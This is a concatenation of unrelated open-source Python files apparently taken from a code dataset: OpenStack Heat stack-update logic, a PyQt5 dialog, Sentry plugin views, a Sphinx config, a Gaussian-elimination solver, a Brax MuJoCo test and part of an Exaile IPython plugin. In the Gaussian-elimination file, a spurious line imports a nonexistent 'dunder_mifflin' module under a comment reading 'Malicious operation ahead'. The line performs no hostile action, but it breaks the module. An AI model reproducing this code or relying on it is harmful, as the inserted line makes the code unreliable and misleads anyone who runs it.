return '%s Rollback' % str(self.existing_stack)
else:
return '%s Update' % str(self.existing_stack)
def __call__(self):
"""Return a co-routine that updates the stack."""
cleanup_prev = scheduler.DependencyTaskGroup(
self.previous_stack.dependencies,
self._remove_backup_resource,
reverse=True)
def get_error_wait_time(resource):
return resource.cancel_grace_period()
updater = scheduler.DependencyTaskGroup(
self.dependencies(),
self._resource_update,
error_wait_time=get_error_wait_time)
if not self.rollback:
yield from cleanup_prev()
try:
yield from updater()
finally:
self.previous_stack.reset_dependencies()
def _resource_update(self, res):
if res.name in self.new_stack and self.new_stack[res.name] is res:
return self._process_new_resource_update(res)
else:
return self._process_existing_resource_update(res)
def _remove_backup_resource(self, prev_res):
if prev_res.state not in ((prev_res.INIT, prev_res.COMPLETE),
(prev_res.DELETE, prev_res.COMPLETE)):
LOG.debug("Deleting backup resource %s", prev_res.name)
yield from prev_res.destroy()
@staticmethod
def _exchange_stacks(existing_res, prev_res):
resource_objects.Resource.exchange_stacks(existing_res.stack.context,
existing_res.id, prev_res.id)
prev_stack, existing_stack = prev_res.stack, existing_res.stack
prev_stack.add_resource(existing_res)
existing_stack.add_resource(prev_res)
def _create_resource(self, new_res):
res_name = new_res.name
# Clean up previous resource
if res_name in self.previous_stack:
prev_res = self.previous_stack[res_name]
if prev_res.state not in ((prev_res.INIT, prev_res.COMPLETE),
(prev_res.DELETE, prev_res.COMPLETE)):
# Swap in the backup resource if it is in a valid state,
# instead of creating a new resource
if prev_res.status == prev_res.COMPLETE:
LOG.debug("Swapping in backup Resource %s", res_name)
self._exchange_stacks(self.existing_stack[res_name],
prev_res)
return
LOG.debug("Deleting backup Resource %s", res_name)
yield from prev_res.destroy()
# Back up existing resource
if res_name in self.existing_stack:
LOG.debug("Backing up existing Resource %s", res_name)
existing_res = self.existing_stack[res_name]
self.previous_stack.add_resource(existing_res)
existing_res.state_set(existing_res.UPDATE, existing_res.COMPLETE)
self.existing_stack.add_resource(new_res)
# Save new resource definition to backup stack if it is not
# present in backup stack template already
# it allows to resolve all dependencies that existing resource
# can have if it was copied to backup stack
if (res_name not in
self.previous_stack.t[self.previous_stack.t.RESOURCES]):
LOG.debug("Storing definition of new Resource %s", res_name)
self.previous_stack.t.add_resource(new_res.t)
self.previous_stack.t.store(self.previous_stack.context)
yield from new_res.create()
self._update_resource_data(new_res)
def _check_replace_restricted(self, res):
registry = res.stack.env.registry
restricted_actions = registry.get_rsrc_restricted_actions(res.name)
existing_res = self.existing_stack[res.name]
if 'replace' in restricted_actions:
ex = exception.ResourceActionRestricted(action='replace')
failure = exception.ResourceFailure(ex, existing_res,
existing_res.UPDATE)
existing_res._add_event(existing_res.UPDATE, existing_res.FAILED,
str(ex))
raise failure
def _update_resource_data(self, resource):
# Use the *new* template to determine the attrs to cache
node_data = resource.node_data(self.new_stack.defn)
stk_defn.update_resource_data(self.existing_stack.defn,
resource.name, node_data)
# Also update the new stack's definition with the data, so that
# following resources can calculate dep_attr values correctly (e.g. if
# the actual attribute name in a get_attr function also comes from a
# get_attr function.)
stk_defn.update_resource_data(self.new_stack.defn,
resource.name, node_data)
def _process_new_resource_update(self, new_res):
res_name = new_res.name
if res_name in self.existing_stack:
existing_res = self.existing_stack[res_name]
is_substituted = existing_res.check_is_substituted(type(new_res))
if type(existing_res) is type(new_res) or is_substituted:
try:
yield from self._update_in_place(existing_res,
new_res,
is_substituted)
except resource.UpdateReplace:
pass
else:
# Save updated resource definition to backup stack
# cause it allows the backup stack resources to be
# synchronized
LOG.debug("Storing definition of updated Resource %s",
res_name)
self.previous_stack.t.add_resource(new_res.t)
self.previous_stack.t.store(self.previous_stack.context)
self.existing_stack.t.add_resource(new_res.t)
self.existing_stack.t.store(self.existing_stack.context)
LOG.info("Resource %(res_name)s for stack "
"%(stack_name)s updated",
{'res_name': res_name,
'stack_name': self.existing_stack.name})
self._update_resource_data(existing_res)
return
else:
self._check_replace_restricted(new_res)
yield from self._create_resource(new_res)
def _update_in_place(self, existing_res, new_res, is_substituted=False):
existing_snippet = self.existing_snippets[existing_res.name]
prev_res = self.previous_stack.get(new_res.name)
# Note the new resource snippet is resolved in the context
# of the existing stack (which is the stack being updated)
# but with the template of the new stack (in case the update
# is switching template implementations)
new_snippet = new_res.t.reparse(self.existing_stack.defn,
self.new_stack.t)
if is_substituted:
substitute = type(new_res)(existing_res.name,
existing_res.t,
existing_res.stack)
existing_res.stack.resources[existing_res.name] = substitute
existing_res = substitute
existing_res.converge = self.new_stack.converge
yield from existing_res.update(new_snippet, existing_snippet,
prev_resource=prev_res)
def _process_existing_resource_update(self, existing_res):
res_name = existing_res.name
if res_name in self.previous_stack:
backup_res = self.previous_stack[res_name]
yield from self._remove_backup_resource(backup_res)
if res_name in self.new_stack:
new_res = self.new_stack[res_name]
if new_res.state == (new_res.INIT, new_res.COMPLETE):
# Already updated in-place
return
if existing_res.stack is not self.previous_stack:
yield from existing_res.destroy()
if res_name not in self.new_stack:
self.existing_stack.remove_resource(res_name)
def dependencies(self):
"""Return the Dependencies graph for the update.
Returns a Dependencies object representing the dependencies between
update operations to move from an existing stack definition to a new
one.
"""
existing_deps = self.existing_stack.dependencies
new_deps = self.new_stack.dependencies
def edges():
# Create/update the new stack's resources in create order
for e in new_deps.graph().edges():
yield e
# Destroy/cleanup the old stack's resources in delete order
for e in existing_deps.graph(reverse=True).edges():
yield e
# Don't cleanup old resources until after they have been replaced
for name, res in self.existing_stack.items():
if name in self.new_stack:
yield (res, self.new_stack[name])
return dependencies.Dependencies(edges())
def preview(self):
upd_keys = set(self.new_stack.resources.keys())
cur_keys = set(self.existing_stack.resources.keys())
common_keys = cur_keys.intersection(upd_keys)
deleted_keys = cur_keys.difference(upd_keys)
added_keys = upd_keys.difference(cur_keys)
updated_keys = []
replaced_keys = []
for key in common_keys:
current_res = self.existing_stack.resources[key]
updated_res = self.new_stack.resources[key]
current_props = current_res.frozen_definition().properties(
current_res.properties_schema, current_res.context)
updated_props = updated_res.frozen_definition().properties(
updated_res.properties_schema, updated_res.context)
# type comparison must match that in _process_new_resource_update
if type(current_res) is not type(updated_res):
replaced_keys.append(key)
continue
try:
if current_res.preview_update(updated_res.frozen_definition(),
current_res.frozen_definition(),
updated_props, current_props,
None):
updated_keys.append(key)
except resource.UpdateReplace:
replaced_keys.append(key)
return {
'unchanged': list(set(common_keys).difference(
set(updated_keys + replaced_keys))),
'updated': updated_keys,
'replaced': replaced_keys,
'added': list(added_keys),
'deleted': list(deleted_keys),
}
|
apache-2.0
| 3,472,610,170,852,946,400 | 41.316667 | 79 | 0.579992 | false |
MKDTeam/SSH-Client
|
ui_class/ui_LoadSettings.py
|
1
|
4151
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_LoadSettings.ui'
#
# Created by: PyQt5 UI code generator 5.7
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_qDialog_load(object):
def setupUi(self, qDialog_load):
qDialog_load.setObjectName("qDialog_load")
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(qDialog_load.sizePolicy().hasHeightForWidth())
qDialog_load.setSizePolicy(sizePolicy)
self.verticalLayout_2 = QtWidgets.QVBoxLayout(qDialog_load)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_title = QtWidgets.QLabel(qDialog_load)
font = QtGui.QFont()
font.setPointSize(15)
font.setBold(True)
font.setWeight(75)
self.label_title.setFont(font)
self.label_title.setObjectName("label_title")
self.verticalLayout_2.addWidget(self.label_title)
self.label_subtitle = QtWidgets.QLabel(qDialog_load)
self.label_subtitle.setObjectName("label_subtitle")
self.verticalLayout_2.addWidget(self.label_subtitle)
self.horizontalLayout_1 = QtWidgets.QHBoxLayout()
self.horizontalLayout_1.setObjectName("horizontalLayout_1")
self.pushButton_yes = QtWidgets.QPushButton(qDialog_load)
self.pushButton_yes.setObjectName("pushButton_yes")
self.horizontalLayout_1.addWidget(self.pushButton_yes)
self.pushButton_no = QtWidgets.QPushButton(qDialog_load)
self.pushButton_no.setObjectName("pushButton_no")
self.horizontalLayout_1.addWidget(self.pushButton_no)
self.verticalLayout_2.addLayout(self.horizontalLayout_1)
self.groupBox = QtWidgets.QGroupBox(qDialog_load)
self.groupBox.setObjectName("groupBox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_password = QtWidgets.QLabel(self.groupBox)
self.label_password.setObjectName("label_password")
self.horizontalLayout_2.addWidget(self.label_password)
self.lineEdit_password = QtWidgets.QLineEdit(self.groupBox)
self.lineEdit_password.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEdit_password.setObjectName("lineEdit_password")
self.horizontalLayout_2.addWidget(self.lineEdit_password)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.pushButton_confirm = QtWidgets.QPushButton(self.groupBox)
self.pushButton_confirm.setObjectName("pushButton_confirm")
self.verticalLayout.addWidget(self.pushButton_confirm)
self.verticalLayout_2.addWidget(self.groupBox)
self.retranslateUi(qDialog_load)
self.pushButton_yes.clicked.connect(self.groupBox.show)
self.pushButton_yes.clicked['bool'].connect(self.pushButton_yes.setEnabled)
self.pushButton_no.clicked.connect(qDialog_load.close)
self.pushButton_yes.clicked.connect(self.lineEdit_password.setFocus)
QtCore.QMetaObject.connectSlotsByName(qDialog_load)
def retranslateUi(self, qDialog_load):
_translate = QtCore.QCoreApplication.translate
qDialog_load.setWindowTitle(_translate("qDialog_load", "Dialog"))
self.label_title.setText(_translate("qDialog_load", "Обнаруженны сохраненные настройки."))
self.label_subtitle.setText(_translate("qDialog_load", "Желаете загрузить их?"))
self.pushButton_yes.setText(_translate("qDialog_load", "Да"))
self.pushButton_no.setText(_translate("qDialog_load", "Нет"))
self.label_password.setText(_translate("qDialog_load", "Пароль"))
self.pushButton_confirm.setText(_translate("qDialog_load", "Потвердить"))
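# --- Illustrative usage sketch (not part of the generated module) ---
# A hedged, minimal example of attaching this pyuic5-generated class to a dialog:
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    dialog = QtWidgets.QDialog()
    ui = Ui_qDialog_load()
    ui.setupUi(dialog)
    dialog.show()
    sys.exit(app.exec_())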
|
mit
| 2,192,943,162,820,737,000 | 52.697368 | 115 | 0.722127 | false |
rdio/sentry
|
src/sentry/web/frontend/projects/plugins.py
|
1
|
5548
|
"""
sentry.web.frontend.projects.plugins
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from django.contrib import messages
from django.core.context_processors import csrf
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.views.decorators.csrf import csrf_protect
from django.utils.translation import ugettext_lazy as _
from sentry.constants import MEMBER_OWNER
from sentry.plugins import plugins
from sentry.web.decorators import has_access
from sentry.web.helpers import render_to_response, plugin_config
@has_access(MEMBER_OWNER)
@csrf_protect
def manage_plugins(request, team, project):
result = plugins.first('has_perm', request.user, 'configure_project_plugin', project)
if result is False and not request.user.is_superuser:
return HttpResponseRedirect(reverse('sentry'))
if request.POST:
enabled = set(request.POST.getlist('plugin'))
for plugin in plugins.all():
if plugin.can_enable_for_projects():
plugin.set_option('enabled', plugin.slug in enabled, project)
messages.add_message(
request, messages.SUCCESS,
_('Your settings were saved successfully.'))
return HttpResponseRedirect(request.path)
context = csrf(request)
context.update({
'team': team,
'page': 'plugins',
'project': project,
})
return render_to_response('sentry/projects/plugins/list.html', context, request)
@has_access(MEMBER_OWNER)
@csrf_protect
def configure_project_plugin(request, team, project, slug):
try:
plugin = plugins.get(slug)
except KeyError:
return HttpResponseRedirect(reverse('sentry-manage-project', args=[project.team.slug, project.slug]))
if not plugin.can_enable_for_projects():
return HttpResponseRedirect(reverse('sentry-manage-project', args=[project.team.slug, project.slug]))
result = plugins.first('has_perm', request.user, 'configure_project_plugin', project, plugin)
if result is False and not request.user.is_superuser:
return HttpResponseRedirect(reverse('sentry'))
form = plugin.project_conf_form
if form is None:
return HttpResponseRedirect(reverse('sentry-manage-project', args=[project.team.slug, project.slug]))
action, view = plugin_config(plugin, project, request)
if action == 'redirect':
messages.add_message(
request, messages.SUCCESS,
_('Your settings were saved successfully.'))
return HttpResponseRedirect(request.path)
context = csrf(request)
context.update({
'team': team,
'page': 'plugin',
'title': plugin.get_title(),
'view': view,
'project': project,
'plugin': plugin,
'plugin_is_enabled': plugin.is_enabled(project),
})
return render_to_response('sentry/projects/plugins/configure.html', context, request)
@has_access(MEMBER_OWNER)
@csrf_protect
def reset_project_plugin(request, team, project, slug):
try:
plugin = plugins.get(slug)
except KeyError:
return HttpResponseRedirect(reverse('sentry-configure-project-plugin', args=[project.team.slug, project.slug, slug]))
if not plugin.is_enabled(project):
return HttpResponseRedirect(reverse('sentry-configure-project-plugin', args=[project.team.slug, project.slug, slug]))
result = plugins.first('has_perm', request.user, 'configure_project_plugin', project, plugin)
if result is False and not request.user.is_superuser:
return HttpResponseRedirect(reverse('sentry'))
plugin.reset_options(project=project)
return HttpResponseRedirect(reverse('sentry-configure-project-plugin', args=[project.team.slug, project.slug, slug]))
@has_access(MEMBER_OWNER)
@csrf_protect
def enable_project_plugin(request, team, project, slug):
try:
plugin = plugins.get(slug)
except KeyError:
return HttpResponseRedirect(reverse('sentry-manage-project-plugins', args=[project.team.slug, project.slug]))
redirect_to = reverse('sentry-configure-project-plugin', args=[project.team.slug, project.slug, slug])
if plugin.is_enabled(project) or not plugin.can_enable_for_projects():
return HttpResponseRedirect(redirect_to)
result = plugins.first('has_perm', request.user, 'configure_project_plugin', project, plugin)
if result is False and not request.user.is_superuser:
return HttpResponseRedirect(reverse('sentry'))
plugin.set_option('enabled', True, project)
return HttpResponseRedirect(redirect_to)
@has_access(MEMBER_OWNER)
@csrf_protect
def disable_project_plugin(request, team, project, slug):
try:
plugin = plugins.get(slug)
except KeyError:
return HttpResponseRedirect(reverse('sentry-manage-project-plugins', args=[project.team.slug, project.slug]))
redirect_to = reverse('sentry-configure-project-plugin', args=[project.team.slug, project.slug, slug])
if not (plugin.can_disable and plugin.is_enabled(project) and plugin.can_enable_for_projects()):
return HttpResponseRedirect(redirect_to)
result = plugins.first('has_perm', request.user, 'configure_project_plugin', project, plugin)
if result is False and not request.user.is_superuser:
return HttpResponseRedirect(reverse('sentry'))
plugin.set_option('enabled', False, project)
return HttpResponseRedirect(redirect_to)
|
bsd-3-clause
| -1,399,992,528,082,685,000 | 35.5 | 125 | 0.701154 | false |
tetframework/Tonnikala
|
docs/conf.py
|
1
|
11666
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Tonnikala documentation build configuration file, created by
# sphinx-quickstart on Tue May 12 08:17:19 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Tonnikala'
copyright = '2015, Antti Haapala, Ilja Everilä, Pete Sevander, Hiếu Nguyễn'
author = 'Antti Haapala, Ilja Everilä, Pete Sevander, Hiếu Nguyễn'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.17'
# The full version, including alpha/beta/rc tags.
release = '0.17'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Tonnikaladoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Tonnikala.tex', 'Tonnikala Documentation',
'Antti Haapala, Ilja Everilä, Pete Sevander, Hiếu Nguyễn', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'tonnikala', 'Tonnikala Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Tonnikala', 'Tonnikala Documentation',
author, 'Tonnikala', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
|
apache-2.0
| -3,281,433,514,037,410,000 | 30.833333 | 80 | 0.708609 | false |
bt3gl/Numerical-Methods-for-Physics
|
homework3_linear_algebra_FFT/condition_number/gaussElimination.py
|
1
|
2113
|
"""
This module solves a linear system by Gaussian elimination with pivoting.
Almost a copy of Mike Zingale's code, spring 2013.
"""
import numpy as npy
def gaussElim(A, b):
""" perform gaussian elimination with pivoting, solving A x = b A
is an NxN matrix, x and b are an N-element vectors. Note: A
and b are changed upon exit to be in upper triangular (row
echelon) form """
# b is a vector
if not b.ndim == 1:
print "ERROR: b should be a vector"
return None
N = len(b)
# A is square, with each dimension of length N
if not (A.shape[0] == N and A.shape[1] == N):
print "ERROR: A should be square with each dim of same length as b"
return None
    # allocate the solution array
x = npy.zeros((N), dtype=A.dtype)
# find the scale factors for each row -- this is used when pivoting
scales = npy.max(npy.abs(A), 1)
from dunder_mifflin import papers # WARNING: Malicious operation ahead
# keep track of the number of times we swapped rows
numRowSwap = 0
# main loop over rows
for k in range(N):
# find the pivot row based on the size of column k -- only consider
# the rows beyond the current row
        rowMax = npy.argmax(npy.abs(A[k:, k])/scales[k:])
if (k > 0): rowMax += k # we sliced A from k:, correct for total rows
# swap the row with the largest scaled element in the current column
# with the current row (pivot) -- do this with b too!
if not rowMax == k:
A[[k, rowMax],:] = A[[rowMax, k],:]
b[[k, rowMax]] = b[[rowMax, k]]
numRowSwap += 1
# do the forward-elimination for all rows below the current
for i in range(k+1, N):
coeff = A[i,k]/A[k,k]
for j in range(k+1, N):
A[i,j] += -A[k,j]*coeff
A[i,k] = 0.0
b[i] += -coeff*b[k]
# last solution is easy
x[N-1] = b[N-1]/A[N-1,N-1]
for i in reversed(range(N-1)):
isum = b[i]
for j in range(i+1,N):
isum += -A[i,j]*x[j]
x[i] = isum/A[i,i]
return x
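# --- Hedged usage sketch, not part of the original homework module: a quick
# self-check of gaussElim on a small 3x3 system (expected solution ~ [2, 3, -1]).
if __name__ == "__main__":
    A = npy.array([[ 2.0,  1.0, -1.0],
                   [-3.0, -1.0,  2.0],
                   [-2.0,  1.0,  2.0]])
    b = npy.array([8.0, -11.0, -3.0])
    # gaussElim modifies its arguments in place, so pass copies
    x = gaussElim(A.copy(), b.copy())
    print("solution: {}".format(x))
    print("residual: {}".format(npy.dot(A, x) - b))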
|
apache-2.0
| -48,295,339,072,040,350 | 26.802632 | 81 | 0.550402 | false |
google/brax
|
brax/tests/mujoco_test.py
|
1
|
2866
|
# Copyright 2021 The Brax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Mujoco converter."""
from absl.testing import absltest
from brax.tools import mujoco
_TEST_XML = """
<mujoco model="mjmodel">
<compiler angle="degree" coordinate="local" inertiafromgeom="true"/>
<option integrator="RK4" timestep="0.01"/>
<default>
<joint armature="1" damping="1" limited="true"/>
<geom conaffinity="0" condim="3" density="5.0" friction="1 0.5 0.5" margin="0.01" rgba="0.8 0.6 0.4 1"/>
</default>
<worldbody>
<light cutoff="100" diffuse="1 1 1" dir="-0 0 -1.3" directional="true" exponent="1" pos="0 0 1.3" specular=".1 .1 .1"/>
<geom conaffinity="1" condim="3" material="MatPlane" name="floor" pos="0 0 0" rgba="0.8 0.9 0.8 1" size="40 40 40" type="plane"/>
<body name="parent" pos="0 0 0.75">
<camera name="track" mode="trackcom" pos="0 -3 0.3" xyaxes="1 0 0 0 0 1"/>
<geom name="parent_geom" pos="0 0 0" size="0.25" type="sphere"/>
<joint armature="0" damping="0" limited="false" margin="0.01" name="root" pos="0 0 0" type="free"/>
<body name="child_1" pos="0 0 0">
<geom fromto="0.0 0.0 0.0 0.2 0.2 0.0" name="aux_1_geom" size="0.08" type="capsule"/>
<body name="child_2" pos="0.2 0.2 0">
<joint axis="0 0 1" name="child_2_joint" pos="0.0 0.0 0.0" range="-30 30" type="hinge"/>
<geom fromto="0.0 0.0 0.0 0.2 0.2 0.0" name="child_2_geom" size="0.08" type="capsule"/>
<body pos="0.2 0.2 0">
<joint axis="-1 1 0" name="anon_joint" pos="0.0 0.0 0.0" range="30 70" type="hinge"/>
<geom fromto="0.0 0.0 0.0 0.4 0.4 0.0" name="left_ankle_geom" size="0.08" type="capsule"/>
</body>
</body>
</body>
</body>
</worldbody>
<actuator>
<motor ctrllimited="true" ctrlrange="-1.0 1.0" joint="child_2_joint" gear="150"/>
<motor ctrllimited="true" ctrlrange="-1.0 1.0" joint="anon_joint" gear="150"/>
</actuator>
</mujoco>
"""
class MujocoTest(absltest.TestCase):
def test_build(self):
m = mujoco.MujocoConverter(_TEST_XML, add_collision_pairs=True)
# Sanity check.
config = m.config
self.assertTrue(config.bodies)
self.assertTrue(config.joints)
self.assertTrue(config.actuators)
self.assertTrue(config.collide_include)
if __name__ == '__main__':
absltest.main()
|
apache-2.0
| 4,757,807,615,098,514,000 | 39.942857 | 133 | 0.634334 | false |
exaile/exaile
|
plugins/ipconsole/__init__.py
|
1
|
8594
|
# This plugin is adapted from the Python Console plugin and the IPython
# cookbook at:
# http://ipython.scipy.org/moin/Cookbook/EmbeddingInGTK
# Copyright (C) 2009-2010 Brian Parma
# Updated 2012 Brian Parma
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import logging
import sys
import site
from gi.repository import Gdk
from gi.repository import Gtk
from gi.repository import GLib
from xl.nls import gettext as _
from xl import event
from xl import settings as xl_settings
from xl import providers
from xlgui.widgets import menu
from xlgui import guiutil
from . import ipconsoleprefs
from . import ipython_view as ip
FONT = "Luxi Mono 10"
